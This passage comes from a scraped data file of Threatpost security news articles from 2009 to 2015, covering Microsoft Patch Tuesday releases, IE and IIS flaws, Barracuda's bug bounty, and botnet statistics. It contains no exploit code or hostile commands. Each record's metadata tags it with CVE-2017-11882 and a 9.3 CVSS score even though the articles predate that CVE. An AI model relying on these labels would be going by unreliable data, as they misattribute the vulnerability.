Information Disclosure vulnerability, while [the Microsoft Advisory ](<http://www.microsoft.com/technet/security/advisory/971492.mspx>)refers to this as an elevation of privilege,\u201d says nCircle\u2019s Tyler Reguly.\n\nThe point, he said, is that the bug should be called what it is\u2013an access control breach or an authentication bypass. 
SRD acknowledges the Authentication Bypass but downplays it because you are accessing a single page with the anonymous user privileges, he added.\n\n[Read the full story](<http://securitywatch.eweek.com/browsers/security_researcher_microsoft_downplaying_iis_vulnerability.html?kc=rss>) [eweek.com]\n\nHere\u2019s [our previous coverage](<https://threatpost.com/microsoft-accused-downplaying-iis-flaw-052009/>) of this issue.\n", "cvss3": {}, "published": "2009-05-21T00:03:55", "type": "threatpost", "title": "Microsoft accused of downplaying IIS flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:07", "id": "THREATPOST:765141925BCF61E1BEC4EA2E7E28C380", "href": "https://threatpost.com/microsoft-accused-downplaying-iis-flaw-052009/72754/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:53", "description": "Microsoft has been busy of late, what with the scramble surrounding the [Flame malware](<https://threatpost.com/microsoft-details-flame-hash-collision-attack-060612/>) and the forged certificate that the attackers were able to use to spread the malware via a fake Windows Update service. Now, the company is planning to release seven bulletins next Tuesday covering 28 vulnerabilities in its [June Patch Tuesday](<http://technet.microsoft.com/en-us/security/bulletin/ms12-jun>).\n\nThree of the bulletins Microsoft will release are rated critical, and all of the vulnerabilities they cover can lead to remote code execution. The four other bulletins are rated important, and one of those can result in remote code execution. 
The seven bulletins will fix flaws in Windows, the .NET Framework, Microsoft Dynamics, Internet Explorer and Visual Basic for Applications.\n\nMicrosoft will also be rolling out a change to its Windows Update service in the coming days that is designed to harden the infrastructure and prevent the kind of attack that the Flame authors were able to pull off. That change will involve deploying a new certificate that will be the only one trusted by WU clients, and that certificate will be used only to protect WU files.\n\nHere\u2019s the list of the bulletins:\n\nBulletin ID | Maximum Severity Rating and Vulnerability Impact | Restart Requirement | Affected Software\n---|---|---|---\nBulletin 1 | [Critical](<http://go.microsoft.com/fwlink/?LinkId=21140>) Remote Code Execution | Requires restart | Microsoft Windows\nBulletin 2 | [Critical](<http://go.microsoft.com/fwlink/?LinkId=21140>) Remote Code Execution | Requires restart | Microsoft Windows, Internet Explorer\nBulletin 3 | [Critical](<http://go.microsoft.com/fwlink/?LinkId=21140>) Remote Code Execution | May require restart | Microsoft Windows, Microsoft .NET Framework\nBulletin 4 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) Remote Code Execution | May require restart | Microsoft Office, Microsoft Visual Basic for Applications\nBulletin 5 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) Elevation of Privilege | May require restart | Microsoft Dynamics AX\nBulletin 6 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) Elevation of Privilege | Requires restart | Microsoft Windows\nBulletin 7 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) Elevation of Privilege | Requires restart | Microsoft Windows\n", "cvss3": {}, "published": "2012-06-07T17:29:16", "type": "threatpost", "title": "Microsoft to Fix 28 Vulnerabilities in June Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": 
"2013-04-17T16:32:05", "id": "THREATPOST:E46805A1822D16B4725517D4B8786F57", "href": "https://threatpost.com/microsoft-fix-28-vulnerabilities-june-patch-tuesday-060712/76662/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "description": "Following the lead of Mozilla and Google, Barracuda Networks is launching a bug bounty program that will pay out cash rewards for vulnerabilities found in the company\u2019s own products.\n\nThe move by Barracuda, a maker of mail security and data protection products, is the first such bug bounty program offered by a pure security technology vendor. Mozilla and Google are the two most prominent examples of general technology companies that offer rewards for vulnerabilities, and both of those companies have seen their programs succeed in the last year. In fact, both Google and Mozilla have raised the prices that they pay for the most severe bugs, with [Mozilla shelling out up to $3,000](<https://threatpost.com/mozilla-bumps-bug-bounty-3000-071610/>) and [Google paying as much as $3,133.7 for bugs](<https://threatpost.com/google-ups-bug-bounty-ante-313370-072010/>).\n\nBarracuda officials said they\u2019ll match Google\u2019s top price for severe bugs and the minimum bug bounty will be $500. The company will only pay out rewards for bugs that are disclosed privately to Barracuda, although once the bug is fixed, the researcher is free to disclose it publicly. Bugs found in Barracuda\u2019s Spam and Virus Firewall, Web Filter, Web Application Firewall and NG Firewall are eligible for the cash rewards. \n\nBugs that are in scope for the reward program are vulnerabilities that compromise confidentiality, availability, integrity or authentication. 
Those would include vulnerabilities such as remote exploits, privilege escalation, cross-site scripting, code execution and command injection.\n\n\u201cSecurity product vendors should be at the forefront of promoting security research,\u201d Paul Judge, chief research officer at Barracuda Networks, said in a statement. \u201cThis initiative reflects our commitment to our customers and the security community at large. The goal of this program is to reward researchers for their hard work as well as to promote and encourage responsible disclosure.\u201d\n\nAs a profitable, legitimate market for vulnerability information has developed in recent years with the success of the Zero Day Initiative and other third-party brokers, there has been more and more pressure on the vendors themselves to pay for bugs. \n\nWhile Mozilla and Google officials have been happy with the results of their bug bounty programs\u2013[Google in fact just expanded its program to its web properties](<https://threatpost.com/google-extends-bug-bounty-web-properties-110110/>)\u2013and researchers have praised the companies for recognizing their work, other high-profile software vendors have stayed on the sidelines. 
Microsoft officials have repeatedly said that the company will not pay for bugs, and Apple and Adobe, which have been under increased scrutiny by attackers and researchers of late, have not offered bounties either.\n", "cvss3": {}, "published": "2010-11-09T14:28:15", "type": "threatpost", "title": "Barracuda Networks Launches Bug Bounty Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:14:41", "id": "THREATPOST:0273E2F0D7B4CECA41893B066B3C2D24", "href": "https://threatpost.com/barracuda-networks-launches-bug-bounty-program-110910/74652/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:42", "description": "As expected, Microsoft delivered a patch today for a [zero-day vulnerability in Internet Explorer 8](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>) that was disclosed by HP\u2019s Zero Day Initiative three weeks ago, six months after it was reported to the ZDI.\n\nThe IE8 patch, [MS14-035](<https://technet.microsoft.com/library/security/ms14-035>), is included in a cumulative Internet Explorer rollup that patches 59 flaws in the browser. Most of them are remote-code execution bugs rolling all the way back to IE 6 running on Windows Server 2003 SP2.\n\nThe zero day affects only IE 8, which lacks some of the exploit mitigations in later versions of the browser. 
Microsoft said in May that it was aware of the issue.\n\n\u201cAlthough no attacks have been detected in the wild, the ZDI advisory has given attackers a head start understanding this vulnerability, possibly reducing the time required for researchers to reverse engineer the fix and devise exploit code,\u201d said Craig Young, a security researcher with Tripwire.\n\nSeven bulletins were released today, one other rated critical, and five rated important.\n\nExperts are urging IT administrators to take a close look at a bulletin for Microsoft Word, [MS14-034](<https://technet.microsoft.com/library/security/ms14-034>), which while rated important by Microsoft, should be the next highest patching priority behind IE.\n\nThe bulletin affects Microsoft Word 2007; users could be exposed to remote code execution exploits if a malicious Word document is opened on a vulnerable computer.\n\n\u201cMicrosoft rates it only \u2018important\u2019 because user interaction is required\u2014one has to open a Word file\u2014but it allows the attacker Remote Code Execution. In addition, attackers have become quite skilled at tricking users into opening files,\u201d said Qualys CTO Wolfgang Kandek. \u201cWho wouldn\u2019t open a document that brings new information about the company\u2019s retirement plan? The Word vulnerability is in the newer DOCX file format and only applies to the 2007 release. If you are using the newer versions of Office/Word 2010 or 2013 you are not affected.\u201d\n\nThe second critical bulletin, [MS14-036](<https://technet.microsoft.com/library/security/ms14-036>), patches remote code execution bugs in the Microsoft graphics component used by Windows, Office and Lync that could be exploited by users visiting malicious webpages or opening a malicious Office file.\n\n\u201cGraphics parsing requires complex logic and has frequently been associated with attack vectors,\u201d said Kandek. 
\u201cIt affects Windows, Office and the Lync IM client because they all bring their own copy.\u201d\n\nThis month brings 2014\u2019s total number of bulletins issued by Microsoft to 36, well below last year\u2019s pace of 46 through June.\n\n\u201cWe have become accustomed to seeing around 100 security bulletins for Microsoft products a year, but it looks as if we are in for fewer this year. This runs counter to the general tendency of the year which has already seen its share of big breaches, 0-days and the big Heartbleed vulnerability in OpenSSL,\u201d Kandek said. \u201cMaybe the reduced count is based on the increased presence of vulnerability brokers that buy up vulnerabilities for internal use? We will see how the second part of the year develops.\u201d\n\nThe remaining bulletins are rated important and include a pair of information disclosure bugs, one denial of service flaw and a tampering vulnerability.\n\n * [MS14-033](<https://technet.microsoft.com/library/security/ms14-033>) addresses an information disclosure vulnerability in Microsoft XML Core Services; an exploit on a website designed to invoke XML Core Services through IE could leak data to an attacker.\n * [MS14-032](<https://technet.microsoft.com/library/security/ms14-032>) also patches an information disclosure bug in Microsoft Lync Server. A user tricked into joining a Lync meeting by clicking on a malicious meeting URL could be exploited.\n * [MS14-031](<https://technet.microsoft.com/library/security/ms14-031>) fixes a denial-of-service bug in TCP. An attacker sending a malicious sequence of packets to the target system could cause it to crash.\n * [MS14-030](<https://technet.microsoft.com/library/security/ms14-030>) patches a vulnerability in Remote Desktop that could allow tampering, Microsoft said. 
If an attacker has man in the middle access to the same network segment as the targeted system during an RDP session and sends malicious RDP packets, they could exploit the vulnerability.\n\n**Adobe Patches Flash Player**\n\nAdobe released a new version of Flash Player that addresses a [critical vulnerability](<http://helpx.adobe.com/security/products/flash-player/apsb14-16.html>) in the software.\n\nFlash 13.0.0.214 and earlier versions for Windows and Macintosh and Adobe Flash Player 11.2.202.359 and earlier versions for Linux are affected.\n\nAdobe said there are no active exploits against these vulnerabilities.\n", "cvss3": {}, "published": "2014-06-10T14:09:16", "type": "threatpost", "title": "June 2014 Microsoft Patch Tuesday security updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-06-13T15:41:16", "id": "THREATPOST:3F9DD13AA9EC2148FD8D14BD00233287", "href": "https://threatpost.com/microsoft-patches-ie8-zero-day-critical-word-bug/106572/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:55", "description": "This video features Tim Rains and Vinny Gullotto of Microsoft discussing the major threats from the second half of 2008.\n", "cvss3": {}, "published": "2009-06-22T10:33:11", "type": "threatpost", "title": "Microsoft Security Intelligence Report: The Vinny and Tim Show", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:58", "id": "THREATPOST:D40D286C87360AFDC61FCD9AD506D78F", "href": "https://threatpost.com/microsoft-security-intelligence-report-vinny-and-tim-show-062209/72853/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:57", "description": "**UPDATE \u2013 **In an unexpected turn, Microsoft\u2019s monthly Patch Tuesday security updates released today did not include patches for Internet 
Explorer vulnerabilities used during the Pwn2Own contest one month ago.\n\nThe popular hacker contest attracted researchers from all over who were targeting all the major browsers, as well as third-party software such as [Flash and Java](<https://threatpost.com/firefox-java-flash-all-taken-down-pwn2own-030713/>). Companies such as VUPEN and MWR Labs were able to beat locked-down versions of [IE 10 running on Windows 8](<https://threatpost.com/pwn2own-browser-exploits-getting-harder-more-expensive-find-030613/>) and Mozilla\u2019s Firefox browser, as well as Chrome running on Windows. Unlike Mozilla and Google, both of which [patched the flaws exploited during the contest within 24 hours](<https://threatpost.com/mozilla-and-google-patch-browser-flaws-used-pwn2own-030813/>), Microsoft had yet to update its browser. This has been compounded by last Thursday\u2019s advance notification, which indicated a cumulative IE update was coming today.\n\n\u201cThis puts them quite a bit behind other browsers that already patched their Pwn2Own bugs,\u201d said Andrew Storms, director of security operations at nCircle.\n\nA Microsoft representative, along with Qualys CTO Wolfgang Kandek, said the delay is likely due to regression testing and QA work necessary for patches.\n\n\u201cMicrosoft works with the security community to protect our customers against all threats and we are investigating possible issues identified by researchers during the Pwn2Own competition. We are not aware of any attacks and the issues should not affect our customers, as Pwn2Own organizers do not publicly disclose the competition\u2019s findings,\u201d said Dustin Childs, group manager, Microsoft Trustworthy Computing.\n\nToday\u2019s IE rollup addresses a pair of critical remote code execution flaws in versions 6-10 of the browser. Both are use-after-free vulnerabilities that exist in the way IE accesses objects in memory that have been deleted. 
\u201cThese vulnerabilities may corrupt memory in such a way that an attacker could execute arbitrary code in the context of a user,\u201d Microsoft said in its advisory [MS13-028](<https://technet.microsoft.com/en-us/security/bulletin/ms13-028>). Users would have to be lured to a website hosting an exploit via a phishing or spam email, Microsoft said.\n\n\u201cMS13-028 has a score of \u201c2\u201d in the Exploitability Index, indicating that the construction of an exploit for the vulnerability is not entirely straightforward and not expected within the next 30 days,\u201d Kandek said.\n\nThe IE update is one of nine bulletins released today addressing 14 vulnerabilities, a relatively light month compared to the 57 updates foisted upon users in February. One other bulletin was rated critical, another remote code execution vulnerability in Microsoft Remote Desktop Client. [MS13-029](<https://technet.microsoft.com/en-us/security/bulletin/ms13-029>) includes patches for Remote Desktop Connection 6.1 Client and Remote Desktop Connection 7.0 Client on Windows XP, Vista and Windows 7, as well as Windows Server 2003, 2008 and 2008 R2.\n\n\u201cA remote-code execution vulnerability exists when the Remote Desktop ActiveX control, mstscax.dll, attempts to access an object in memory that has been deleted. An attacker could exploit the vulnerability by convincing the user to visit a specially crafted webpage.\u201d Microsoft said in its alert. \u201cAn attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user.\u201d\n\nRoss Barrett, senior manager of security engineering at Rapid7 said that while versions 6.1 and 7 are vulnerable, version 8 is unaffected and is not yet the default.\n\n\u201cThis issue could be triggered through an RDP link in a browser or other content. 
A workaround would be to set the \u2018kill-bit\u2019 for these ActiveX controls, but the update actually fixes the issue, rather than disabling the RDP control,\u201d Barrett said.\n\nStorms said there are enough mitigating circumstances to make it less problematic for most businesses.\n\n\u201cThe bug does not affect the latest RDP client, version 8, which dramatically reduces the affected number of machines,\u201d Storms said. \u201cMicrosoft has released mitigation steps to disable the affected ActiveX control. Also, if your users browse with default IE settings, they will be presented with the \u2018gold bar\u2019 warning providing them with an opportunity to opt out of an attack.\u201d\n\nThe remaining seven bulletins are rated important by Microsoft; among them, a denial-of-service bug in Active Directory has caught experts\u2019 attention. [MS13-032](<https://technet.microsoft.com/en-us/security/bulletin/ms13-032>) could be triggered if an attacker sends a specially crafted query to the LDAP service that will consume CPU cycles and cause it to crash. The vulnerability affects Active Directory, Active Directory Application Mode (ADAM), Active Directory Lightweight Directory Service (AD LDS), and Active Directory Services on Microsoft Windows servers.\n\n\u201cIt should be high on the list for enterprise installations,\u201d Kandek said. \u201cAn attacker can shut down the domain controllers for an organization using only a single workstation.\u201d\n\nAmong the remaining bulletins are privilege escalation vulnerabilities and an information disclosure bug:\n\n * [MS13-030](<https://technet.microsoft.com/en-us/security/bulletin/ms13-030>) is an information-disclosure vulnerability in SharePoint that could be exploited if an attacker knew the location of a SharePoint list and gained access with legitimate credentials.\n * [MS13-031](<https://technet.microsoft.com/en-us/security/bulletin/ms13-031>) is a privilege escalation flaw in the Windows Kernel. 
Exploits would require valid credentials in order to carry out an attack.\n * [MS13-033](<https://technet.microsoft.com/en-us/security/bulletin/ms13-033>) affects Windows Client/Server Runtime Subsystem in the way that the system handles objects in memory. Attackers would need valid credentials and local access to pull off an exploit.\n * [MS13-034](<http://technet.microsoft.com/en-us/security/bulletin/ms13-034>) is another privilege escalation bug, this time in Windows Defender, the Microsoft antimalware client. Successful exploits could enable an attacker to run code on an infected machine, view, change or delete data or create new accounts.\n * [MS13-035](<https://technet.microsoft.com/en-us/security/bulletin/ms13-035>) repairs a vulnerability in Microsoft HTML Sanitization Component found in Microsoft Office. An attacker would have to send a malicious Office document to pull off an attack.\n * [MS13-036](<https://technet.microsoft.com/en-us/security/bulletin/ms13-036>) patches three vulnerabilities in Kernel Mode Driver that elevate privileges for an attacker, who must have valid credentials and local access to exploit the flaws.\n\n_This article was updated to include a comment from Microsoft._\n", "cvss3": {}, "published": "2013-04-09T19:18:19", "type": "threatpost", "title": "Pwn2Own IE Vulnerabilities Missing from Microsoft Patch Tuesday Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-18T18:36:16", "id": "THREATPOST:5C60BA94DEDFC24233F8B820C7D23076", "href": "https://threatpost.com/pwn2own-ie-vulnerabilities-missing-microsoft-patch-tuesday-updates-040913/77712/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:49", "description": "The U.S. 
has by far the highest number of bot-infected computers of any country in the world, with nearly four times as many infected PCs as the country in second place, Brazil, according to a new report by Microsoft. The quarterly report on malicious software and Internet attacks shows that while some of the major botnets have been curtailed in recent months, the networks of infected PCs still represent a huge threat.\n\nThe data on botnets, published in [Microsoft\u2019s Security Intelligence Report](<https://www.microsoft.com/security/sir/default.aspx>) for the first half of 2010, paints a somewhat bleak picture of the botnet landscape. Between January and June of this year, Microsoft cleaned more than 6.5 million machines worldwide of bot infections, which represents a 100 percent increase in bot infections from the same period in 2009. This increase comes at a time when there is more attention than ever focused on the botnet problem, both by security researchers and law-enforcement agencies around the world.\n\nMicrosoft measures botnet infections by counting the number of machines that are cleaned of bots by using the company\u2019s Malicious Software Removal Tool. The Microsoft data obviously does not show a complete picture of bot infections across the entire Internet, but gives a snapshot of the infection problem on the machines the company monitors.\n\nIn the last year or so, several major spam botnets have been either completely crippled or in some way damaged by takedown efforts that target the command and control servers that run the botnets. 
Pushdo and Waledac are the two most prominent examples of this effort, and Microsoft officials were deeply involved in the [takedown of Waledac](<https://threatpost.com/waledac-botnet-now-completely-crippled-experts-say-031610/>), eventually going to court in September to get legal ownership of hundreds of IP addresses used by the botnet.\n\nThe company worked with researchers in Germany and Austria, as well as law-enforcement agencies, to gain control of the Waledac C&C servers. However, while the takedown was something of a coup, Waledac was not the top spam botnet and Microsoft\u2019s data shows that there are still a number of large botnets, many of which are far less well-known than Waledac, Pushdo and Zeus, that are wreaking havoc online.\n\nThe most commonly detected bot client in the new SIR is Rimecud, the main piece of malware that is responsible for the Mariposa botnet. In the first half of 2010, Microsoft cleaned more than 3.5 million PCs infected with Rimecud. Some of the more famous botnets, including Rustock, Nuwar and Zbot are pretty far down the list of the most active botnets.\n\n\u201cRimecud is a \u2018kit\u2019 family: different people working independently use a malware creation kit to create their own Rimecud botnets. Rimecud is the primary malware family behind the so-called Mariposa botnet, which infected millions of computers around the world in 2009 and 2010. In July of 2010, the Slovenian Criminal Police arrested a 23-year-old Slovenian citizen suspected of writing the malware code, following the February 2010 arrests of three suspected Mariposa botnet operators by the Spanish Guardia Civil,\u201d Microsoft said in the report. \u201cRimecud is a backdoor worm that spreads via fixed and removable drives, and by sending malicious hyperlinks to a victim\u2019s contacts via several popular instant messaging programs. 
Rimecud can be commanded to take a number of typical botnet actions, including spreading itself via removable drives, downloading and executing additional malware, and stealing passwords.\u201d\n\nRimecud is unlike many other botnets as it has its own network protocol, based on UDP, that it uses for communications between the bots and the C&C servers. A number of other botnets use modified, or somewhat customized, protocols for communication, making it more difficult for researchers to analyze the botnet\u2019s behavior. The attackers behind these botnets have become increasingly intelligent and sophisticated in recent years, and they have learned from their past mistakes, as well as the actions of researchers and law-enforcement agencies. \n\nOne of the key methods attackers have adopted to make life more difficult for researchers is to not use off-the-shelf bot software, but instead buy kits that can create custom bots.\n\n\u201cThese kits are collections of tools, sold and shared within the malware underground, that enable aspiring bot-herders to assemble their own botnet by creating and spreading customized malware variants. Several malware kits are freely available for downloading and sharing; some have been published as open source code, which enables malware developers to create modified versions of the kits. Other kits are developed by individual groups and sold like legitimate commercial software products, sometimes even including support agreements,\u201d Microsoft said in the report. \n", "cvss3": {}, "published": "2010-10-13T16:07:04", "type": "threatpost", "title": "U.S. 
Reigns As Most Bot-Infected Country", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:20:36", "id": "THREATPOST:49045E816279C72FD35E91BF5F87387C", "href": "https://threatpost.com/us-reigns-most-bot-infected-country-101310/74570/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:51", "description": "[](<https://threatpost.com/microsoft-releases-five-bulletins-september-patch-tuesday-091311/>)Microsoft on Tuesday released (again) the five security bulletins for its September Patch Tuesday. None of the fixes being released today is rated critical, with all five being rated important. Three of the bulletins fix flaws that could result in code execution.\n\nMicrosoft also updated the security bulletin it originally released a couple of weeks ago regarding the DigiNotar compromise, revoking trust for an additional six root certificates issued by the CA. The company removed trust for a number of certificates that were cross-signed by GTE and Entrust. Here is the list of certificates placed by Microsoft into the Untrusted Certificate Store:\n\n * DigiNotar Root CA\n * DigiNotar Root CA G2\n * DigiNotar PKIoverheid CA Overheid\n * DigiNotar PKIoverheid CA Organisatie \u2013 G2\n * DigiNotar PKIoverheid CA Overheid en Bedrijven\n * DigiNotar Root CA Issued by Entrust (2 certificates)*\n * DigiNotar Services 1024 CA Issued by Entrust*\n * Diginotar Cyber CA Issued by GTE CyberTrust (3 certificates)*\n\nThe five bulletins released by Microsoft on Tuesday include fixes for vulnerabilities in Windows, Office, Excel, Sharepoint and WINS. In an odd mistake, Microsoft on Friday accidentally made the link to the September bulletins live four days early. 
The page was only available for a short time before Microsoft removed it, but it was long enough for several sites to post the text of the advisories.\n", "cvss3": {}, "published": "2011-09-13T18:08:30", "type": "threatpost", "title": "Microsoft Releases Five Bulletins For September Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:47", "id": "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "href": "https://threatpost.com/microsoft-releases-five-bulletins-september-patch-tuesday-091311/75649/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "description": "There\u2019s a new flaw in all of the current versions of Internet Explorer that is being used in some targeted attacks right now. Microsoft has confirmed the bug and said it is working on a fix, but has no timeline for the patch release yet. The company did not rule out an emergency out-of-band patch, however.\n\nThe new bug in Internet Explorer affects versions 6, 7 and 8, but is not present in IE 9 beta releases, Microsoft said. The company has released an [advisory on the IE vulnerability](<https://www.microsoft.com/technet/security/advisory/2458511.mspx>) and says that some of the exploit protections it has added to recent versions of IE and Windows can help protect against attacks on the bug. Microsoft said that IE 8 running on Windows XP SP 3 and later versions of Windows has DEP (Data Execution Prevention) enabled by default, which helps stop attacks against this specific bug. IE running in Protected Mode also helps mitigate the effects of attacks.\n\n\u201cThe vulnerability exists due to an invalid flag reference within Internet Explorer. It is possible under certain conditions for the invalid flag reference to be accessed after an object is deleted. 
In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution.\n\n\u201cAt this time, we are aware of targeted attacks attempting to use this vulnerability. We will continue to monitor the threat environment and update this advisory if this situation changes. On completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs,\u201d Microsoft said in its advisory.\n\nThe new IE flaw is likely to be targeted through drive-by download attacks, a common attack scenario for browser vulnerabilities. \n\n\u201cIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. 
Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker\u2019s Web site,\u201d Microsoft said.\n", "cvss3": {}, "published": "2010-11-03T16:03:17", "type": "threatpost", "title": "New Bug in Internet Explorer Used in Targeted Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:16:08", "id": "THREATPOST:7E324E4AFB9218DCC9509FB4E2277400", "href": "https://threatpost.com/new-bug-internet-explorer-used-targeted-attacks-110310/74636/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:16", "description": "Microsoft has released a one-click \u201cfix-it\u201d workaround to help Internet Explorer users block malware attacks against an unpatched browser vulnerability.\n\nThe Fix-It workaround, [available here](<http://support.microsoft.com/kb/981374>), effectively disables peer factory in the iepeers.dll binary in affected versions of Internet Explorer. 
\n\nThe workaround comes on the heels of the [public release of exploit code](<https://threatpost.com/exploit-code-published-latest-ie-zero-day-031010/>) into the freely available Metasploit pen-testing framework.\n\nMicrosoft acknowledged the availability of exploit code for the issue and again urged users to upgrade to Internet Explorer 8, which is not vulnerable to this issue.\n\nThe company urged IE users to test the Fix-It workaround thoroughly before deploying as certain functionality that depends on the peer factory class, such as printing from Internet Explorer and the use of web folders, may be affected.\n\nMicrosoft also [confirmed](<http://blogs.technet.com/msrc/archive/2010/03/12/update-on-security-advisory-981374.aspx>) it is considering an out-of-band emergency patch to correct the underlying flaw.\n\nWe have seen speculation that Microsoft might release an update for this issue out-of-band. I can tell you that we are working hard to produce an update which is now in testing. This is a critical and time intensive step of the process as the update must be tested against all affected versions of Internet Explorer on all supported versions of Windows. Additionally, each supported language version needs to be tested as well as testing against thousands of third party applications. We never rule out the possibility of an out-of-band update. When the update is ready for broad distribution, we will make that decision based on customer needs. \n\nMalicious hackers are already exploiting the vulnerability to launch targeted attacks. 
The earliest attacks include the use of a backdoor that allows complete access to a vulnerable machine.\n\nThe backdoor allows an attacker to perform various functions on the compromised system, including uploading and downloading files, executing files, and terminating running processes.\n", "cvss3": {}, "published": "2010-03-15T14:17:12", "type": "threatpost", "title": "Microsoft Issues Fix-It Workaround for IE Zero-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:14:29", "id": "THREATPOST:14B2B02CB661C8C7E1BC1204495F0D25", "href": "https://threatpost.com/microsoft-issues-fix-it-workaround-ie-zero-day-031510/73686/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:01", "description": "SAN FRANCISCO\u2013One of the downsides to being a software company with a huge customer base is that your products are going to be prime targets for attackers. But the flip side to that coin is that you\u2019re going to gather a _lot_ of data about vulnerabilities and attacks.\n\nMicrosoft has been collecting that data for years now and has used it to help inform decisions about new defensive technologies, product improvements and patching strategies. The company shared some of that information Tuesday at the RSA Conference here and some of the data they have is quite revealing. One of the most intriguing bits to come out of the numbers is that while there are still large numbers of remote code execution vulnerabilities being disclosed every year, attackers are exploiting fewer and fewer of them.\n\n\u201cVulnerabilities represent potential risk. But until somebody goes through the effort to develop an exploit that leverages that vulnerability, the risk isn\u2019t actualized. The percentage of remote code execution vulnerabilities that are actually exploited is declining. 
The actual risk appears to be going down based on what we see,\u201d said Matt Miller, principal security software engineer in the Microsoft Security Response Center. \u201cThe absolute number of those bugs continues to decline, as well.\u201d\n\nRemote code execution vulnerabilities are attacker catnip, and that\u2019s especially true of RCE bugs in widely deployed software such as browsers and operating systems. For years, attackers had a field day with vulnerabilities in Internet Explorer and Windows, particularly buffer overflows. Rare was the Patch Tuesday that didn\u2019t include fixes for a buffer overflow or six. But Microsoft has put a lot of resources and effort into making those bugs more difficult to exploit, and Miller said the work has paid off.\n\nIn fact, he said the company didn\u2019t see a single stack corruption exploit in 2014.\n\n\u201cA couple of things have driven that. The Security Development Lifecycle has helped us eradicate these classes of bugs. And we\u2019ve driven mitigations and improvements that have helped too,\u201d Miller said. \u201cIn practice, this isn\u2019t a vulnerability class that people go after anymore.\u201d\n\nThose changes have forced the attacker community to shift gears. Miller said attackers have started targeting use-after-free vulnerabilities more often and have moved heavily into return-oriented programming, a technique that can be used to bypass exploit mitigations in software. At the same time, the rise of easily available exploit kits such as [Angler](<https://threatpost.com/domain-shadowing-latest-angler-exploit-kit-evasion-technique/111396>), [Blackhole](<https://threatpost.com/black-hole-exploit-kit-20-released-091212/77000>) and others have made it much simpler for attackers to go after new vulnerabilities. 
